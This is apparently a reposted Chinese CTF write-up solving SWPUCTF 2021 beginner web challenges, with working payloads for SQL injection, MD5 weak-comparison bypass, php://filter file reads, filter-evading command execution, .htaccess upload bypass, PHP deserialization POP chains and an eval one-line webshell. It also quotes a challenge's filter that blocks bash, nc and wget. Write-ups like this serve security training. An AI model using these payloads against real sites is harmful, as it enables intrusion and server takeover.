SWPUCTF 2021 新生赛

这篇具有很好参考价值的文章主要介绍了SWPUCTF 2021 新生赛。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

😋大家好,我是YAy_17,是一枚爱好网安的小白,自学ing。 

本人水平有限,欢迎各位大佬指点,一起学习💗,一起进步⭐️

⭐️此后如竟没有炬火,我便是唯一的光。⭐️

目录

gift_F12

jicao

easy_md5

caidao

include

easyrce

easy_sql

babyrce

Do_you_know_http

ez_unserialize

easyupload1.0

easyupload2.0

easyupload3.0

no_wakeup

PseudoProtocols

error

hardrce

pop

sql

finalrce

hardrce_3


很久不学习CTF,很多知识点有点淡忘;还有最后一个phar反序列化,不太会做。

gift_F12

SWPUCTF 2021 新生赛

先听听歌吧ovo 查看源代码:

SWPUCTF 2021 新生赛

jicao

<?php
  highlight_file('index.php');
	include("flag.php");
	$id=$_POST['id'];
	$json=json_decode($_GET['json'],true);
	if ($id=="wllmNB"&&$json['x']=="wllm")
		{echo $flag;}
?>

代码中需要通过POST方式传递参数id,并且通过GET方式传递json参数,然而这里的json_decode( )方法,其功能为对 JSON 格式的字符串进行解码,用法为:

json_decode ( string $json [, bool $assoc = false [, int $depth = 512 [, int $options = 0 ]]] )

参数说明:

$json:json格式的字符串

$assoc:

值为 true:表示返回数组形式的数据

值为 false:表示返回对象形式的数据

默认为false

$depth:指定递归深度

$option:JSON解码的掩码选项。现在有两个支持的选项。

第一个是 JSON_BIGINT_AS_STRING,用于将大整数转为字符串,而非默认的float类型。

第二个是JSON_OBJECT_AS_ARRAY, 与将assoc设置为 TRUE 有相同的效果。

因此传递通过POST传递参数id=wllmNB;通过GET方式传递json={"x":"wllm"}

SWPUCTF 2021 新生赛

easy_md5

 <?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
	if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
	}
	else {
    echo 'wrong!';
}
?>

考察md5弱类型碰撞:

        弱类型比较的时候,会把0exxxx当作科学计数法,不管后面的值为任何东西,0的任何次幂都为0

一些字符串md5值以0e开头

QNKCDZO
240610708
s878926199a
s155964671a
s21587387a

        数组绕过

md5()函数计算的是一个字符串的哈希值,对于数组则返回false

a[]=1&b[]=2

caidao

SWPUCTF 2021 新生赛

直接连蚁剑,翻目录,找flag;

include

SWPUCTF 2021 新生赛

传参数file之后,代码审计:

SWPUCTF 2021 新生赛

题目提示我们LFI,尝试使用php://filter伪协议读取文件的内容:

SWPUCTF 2021 新生赛

尝试使用base64解码,得到答案;

easyrce

<?php
	error_reporting(0);
	highlight_file(__FILE__);
	if(isset($_GET['url'])){
		eval($_GET['url']);
	}
?>

rce,直接命令执行即可,直接传url=system("cat / flllllaaaaaaggggggg");

easy_sql

SWPUCTF 2021 新生赛

随便传了一个参数a,但是没反应,看看源代码,发现了在源代码中,存在着提示“参数是wllm”

SWPUCTF 2021 新生赛

题目是SQL注入,先判断注入类型。

SWPUCTF 2021 新生赛

?wllm=-1' union select 1,database(),3--+

之后就是正常的SQL注入了;

?wllm=-1' union select 1,(select flag from test_tb),3--+

babyrce

 <?php
	error_reporting(0);
	header("Content-Type:text/html;charset=utf-8");
	highlight_file(__FILE__);
	if($_COOKIE['admin']==1) {
    include "../next.php";
	}else
    echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

SWPUCTF 2021 新生赛

提示rasalghul.php,访问一下:

 <?php
	error_reporting(0);
	highlight_file(__FILE__);
	error_reporting(0);
	if (isset($_GET['url'])) {
  	$ip=$_GET['url'];
  	if(preg_match("/ /", $ip)){
      	die('nonono');
  	}
  	$a = shell_exec($ip);
  	echo $a;
}
?> 

正则过滤空格,命令执行,用${IFS}来绕过 (还可以通过%3c %09绕过)

ls${IFS}/

Do_you_know_http

SWPUCTF 2021 新生赛

通过Brup来改数据包信息:

SWPUCTF 2021 新生赛

继续改X-Forwarded-For

SWPUCTF 2021 新生赛

ez_unserialize

SWPUCTF 2021 新生赛

看看源代码先:

SWPUCTF 2021 新生赛

提示了,看看robots.txt:

SWPUCTF 2021 新生赛

访问这个php文件,出现反序列化的代码审计:

 <?php
	error_reporting(0);
	show_source("cl45s.php");	
	class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }
    public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "ctf"){
       include("flag.php");
       echo $flag;
    }else{
       echo $this->admin;
       echo $this->passwd;
       echo "Just a bit more!";
        }
    }
}
$p = $_GET['p'];
unserialize($p);
?> 
<?php

class wllm{

     public $admin="admin";

    public $passwd="ctf";

}

$p = new wllm();

var_dump(serialize($p));

?>

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

easyupload1.0

文件上传:

SWPUCTF 2021 新生赛

尝试上传php文件,但是发现失败了,接着改后缀名为jpg,发现还是不行,发现MIME信息还是php的相关信息,尝试改为jpg的MIME头;依然保留php后缀名,发现上传成功:

SWPUCTF 2021 新生赛

之后连马,或者命令执行都可!

SWPUCTF 2021 新生赛

哎?发现不是正确答案,看看phpinfo(),才发现了正确答案;

easyupload2.0

SWPUCTF 2021 新生赛

继续先用上个payload继续打;

SWPUCTF 2021 新生赛

哦 不让上传php了,其他的后缀可以先试试;发现php3是不可以的,但是pht还是可以正常上传的!

easyupload3.0

SWPUCTF 2021 新生赛

提示使用.htaccess文件上传漏洞:

构造.htaccess文件:

<FilesMatch "jpg">

SetHandler application/x-httpd-php

</FilesMatch>

以上代码,表示将jpg文件解析为php文件;

直接上传该文件,之后上传一张jpg后缀的文件,文件内容就是一句话木马;

SWPUCTF 2021 新生赛

上传图片:

SWPUCTF 2021 新生赛

用蚁剑直接连接jpg文件;

no_wakeup

 <?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
        public $admin;
        public $passwd;
        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }
        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }
        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?> 

绕过wakeup函数即可!

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

PseudoProtocols

SWPUCTF 2021 新生赛

题目提示使用php伪协议;

wllm=php://filter/convert.base64-encode/resource=hint.php

SWPUCTF 2021 新生赛

得到上述结果,使用base64解码;得到提示:

SWPUCTF 2021 新生赛

访问上述界面,得到:

<?php
	ini_set("max_execution_time", "180");
	show_source(__FILE__);
	include('flag.php');
	$a= $_GET["a"];
	if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    	echo "success\n";
    	echo $flag;
	}
?> 

大概就是GET方式传参a,a参数利用file_get_contents以只读的方式打开,打开后的内容与I want flag内容一致;

两种方法:

  • data://text/plain

data伪协议,此协议需要在allow_url_fopen和allow_url_include全部为ON的状态下才能使用,很常用的数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入;

用法:data://text/plain;base64,base64编码字符

payload为:a=data://text/plain,I want flag

SWPUCTF 2021 新生赛

  • php://input

php://input协议需要在allow_url_include为ON的状态下使用,可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。

使用方法:php://input,然后post需要执行的数据

SWPUCTF 2021 新生赛

我没打通,我不明白这是为什么....

error

SWPUCTF 2021 新生赛

输入id为1:

SWPUCTF 2021 新生赛

id为2:

SWPUCTF 2021 新生赛

id为1的时候,源代码中存在着提示,单引号闭合;结合题目提示报错注入:

SWPUCTF 2021 新生赛

爆表名:

SWPUCTF 2021 新生赛

最终爆flag(列名没写,都一样):

SWPUCTF 2021 新生赛

hardrce

首先是判断这个题目对应的PHP版本,发现是php7版本:

SWPUCTF 2021 新生赛

附上P神的博客:

一些不包含数字和字母的webshell | 离别歌

无字母数字webshell之提高篇 | 离别歌

SWPUCTF 2021 新生赛

详见无数字字母webshell总结;

pop

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

该题目中涉及到的魔术方法有两个toString和destruct,构造pop链的关键是紧盯魔术方法,找到pop链的头部和尾部,可以看到GET方式传参w00m,也就是pop链的头部,然后就是尾部,尾部就是能够达到恶意攻击的地方,在上述的题目中,清晰可见:w44m类中存在着一个方法GETflag方法,便可输出最终的flag。因此这也是我们的pop链的尾部;

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

w44m类中两个变量的属性并不是共有属性,而是私有属性和保护属性,无法在创建对象的时候,进行赋值;因此我们就直接在类中进行赋值;

接下来思考,如何去调用w44m类中的Getflag方法呢?我们会发现在w33m类中存在tostring方法,可以调用某一个类中的某一个方法。因此我们可以w33m类中的两个变量w00m赋值为w44m类名,w22m赋值为Getflag方法;那么接下来就是去思考怎么去调用w33m类呢?destruct会在对象被销毁时调用,因此只要给w22m类中的w00m变量一个类w33m就可以实现调用;

因此最终的pop链如下:

<?php
class w44m{
    private $admin = 'w00m';
    protected $passwd = '08067';
}

class w22m{
    public $w00m;
}

class w33m{
    public $w00m;
    public $w22m;
}
$a = new w22m();
$a->w00m = new w33m();
$a->w00m->w00m = new w44m();
$a->w00m->w22m = "Getflag";
echo urlencode(serialize($a));
?>

sql

SWPUCTF 2021 新生赛

随便输入了id=1,但是还是上述界面,看一下源代码:发现参数为wllm;

SWPUCTF 2021 新生赛

注入过程中发现“--+”以及空格被绕过,注释的话使用#编码绕过即可,空格的话用/**/来绕过。

SWPUCTF 2021 新生赛

接下来就是爆数据库名,表名、列明以及最终的数据;

爆出数据库名之后,在查询表名的时候,发现=也被过滤了,可以用like来代替;

SWPUCTF 2021 新生赛

在获取最终的数据的时候,发现被截断了:

SWPUCTF 2021 新生赛

但是使用substr()函数的时候,发现该函数还被过滤了。还可以用mid函数:

SWPUCTF 2021 新生赛

最终可以得到flag

SWPUCTF 2021 新生赛

finalrce

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

该题目利用了写文件的方法;但是题目中过滤了“>”符号,涉及到知识盲区了,还可以用tee命令:

tee命令用于将标准输入复制到每个指定文件,并显示到标准输出。tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。

payload:url=l``s / | tee a.txt

SWPUCTF 2021 新生赛

发现两个flag可疑的地方;看到题目中过滤la,尝试访问/flllllaaaaaaggggggg,“*”号被过滤,还可以用“?”

?url=ca``t /flllll????????????? | tee a.txt

成功访问到flag;

hardrce_3

 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?> 

不能用异或和取反了,还可以用自增:

<?php

$_=''.[];
$__=$_[$___];
$_=$__;
$___=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$___.=$_;
$___.=$_;
$_=$__;
$_++;$_++;$_++;$_++;
$___.=$_;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$___.=$_;
$_++;$_++;
$___.=$_;
$____='_';
$_=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$____.=$_;
$_=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$____.=$_;
$_=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$____.=$_;$_++;$____.=$_;
$_=$$____;
$___($_[_]);

SWPUCTF 2021 新生赛

但是不能执行system();发现phpinfo中的disabled_function过滤了很多函数:

SWPUCTF 2021 新生赛

命令执行函数不能用了;没有过滤file_put_contents(),写马再连;

_=file_put_contents('1.php','<?php eval($_POST[x]);?>');

SWPUCTF 2021 新生赛文章来源地址https://www.toymoban.com/news/detail-401358.html

到了这里,关于SWPUCTF 2021 新生赛的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

    NSSCTF平台:https://www.nssctf.cn/ 直接查看源代码 F12 搜 flag 即可。 NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} NSSCTF{welcometo5space} 所以为满足 if 条件,输出flag,构造 Payload: NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a} 这里就是 md5 碰撞了 这里要求 a 和 b 输入值不相同, md5 加密后的值弱类型相等,

    2024年02月04日
    浏览(46)
  • [SWPUCTF 2021 新生赛]easy_md5

    由于php中存在==的弱类型比较,所以我们可以通过hash比较的缺陷去绕过 比如: 也就是只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会现转换字符串的类型,在进行比较,而在比较是因为两个数都是以0e开头会被认为是科学计数法,0e后面

    2024年02月05日
    浏览(39)
  • 2023年8月30日-[SWPUCTF 2021 新生赛]jicao

    包含了flag.php文件,设定了一个POST请求的id和GET请求的json 语句会对GET请求的数据进行json解码 如果id和json变量的值都等于设定字符串,打印flag get传参数 的时候,直接 ?参数名=参数值 。 post传参数 可以利用hackbar插件。

    2024年02月10日
    浏览(43)
  • 字符型注入([SWPUCTF 2021 新生赛]easy_sql)

    拿到题目,查看源码,可知是要输入参数wllm。 输入参数/?wllm=1,得到会显 继续输入参数/?wllm=1\\\',报错,确定为字符型漏洞 1.查看字段列表,发现在字段4报错,确定为3列 2.查看回显 3.查询数据库名(test_db) 4.查看test_db库的表(users) 5.查询字段 6.出现flag字段,查看flag字段的内容

    2024年02月09日
    浏览(39)
  • CTF 全讲解:[SWPUCTF 2021 新生赛]Do_you_know_http

    项目 描述 搜索引擎 Bing 、 Google AI 大模型 文心一言 、 通义千问 、 讯飞星火认知大模型 、 ChatGPT MDN Web Docs https://developer.mozilla.org/zh-CN/ 项目 描述 HackBar 1.2.2 浏览器 Chrome 项目 描述 得分项 HTTP 请求头 题目来源 NSSCTF 雾现 访问题目首页 hello.php 得到如下界面: 意在希望我们使

    2024年02月08日
    浏览(41)
  • [SWPUCTF 2022 新生赛]numgame

    这道题有点东西网页一段计算框,只有加和减数字,但是永远到大不了20,页面也没啥特别的,准备看源码,但是打不开,我以为是环境坏掉了,看wp别人也这样,只不过大佬的开发者工具可以打开,我的就不行 最后试了一下,你要么就在网页右上角更多工具里面手动打开,

    2024年02月13日
    浏览(35)
  • [SWPUCTF 2022 新生赛]ez_ez_php

    这段代码是一个简单的PHP文件处理脚本。让我们逐行进行分析: error_reporting(0);  - 这行代码设置了错误报告的级别为0,意味着不显示任何错误。 if (isset($_GET[\\\'file\\\'])) {  - 这行代码检查是否存在一个名为\\\"file\\\"的GET参数。 if ( substr($_GET[\\\"file\\\"], 0, 3) === \\\"php\\\" ) {  - 这行代码使用 su

    2024年02月12日
    浏览(38)
  • 【pwn】[SWPUCTF 2022 新生赛]InfoPrinter--格式化字符串漏洞,got表劫持,data段修改

    下载附件,checksec检查程序保护情况: No RELRO ,说明got表可修改 接下来看主程序: 函数逻辑还是比较简单,14行出现格式化字符串漏洞,配合pwntools的fmtstr_payload模块可直接攻击,然后就是题目提供了libc,然后第10行又泄露puts函数的地址,可直接计算出基址,然后就是/bin/sh这

    2024年02月08日
    浏览(60)
  • XFF漏洞利用([SWPUCTF 2021 新赛]Do_you_know_http)

    User-Agent:使得服务器能够识别客户使用的操作系统,浏览器版本等.(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中) Cookie:网站为了辨别用户身份进行session跟踪,并储存在用户本地终端上的数据(通常经过加密) X-Forwarded-For:简称XFF头,

    2024年02月09日
    浏览(38)
  • 2022 SWPUCTF Web+Crypto方向wp

    web 欢迎来到web安全 签到题,F12直接找出flag easy_sql 首先根据提示传入?wllm=1看看有无回显 然后我们发现了正常回显,接着用单引号试试闭合方式 通过对回显错误信息的分析,为了方便观察,我把包裹的引号隔开’ ‘1’’ LIMIT 0,1 ’ 这样我们很容易发现后面多出来了一个引号

    2024年02月09日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包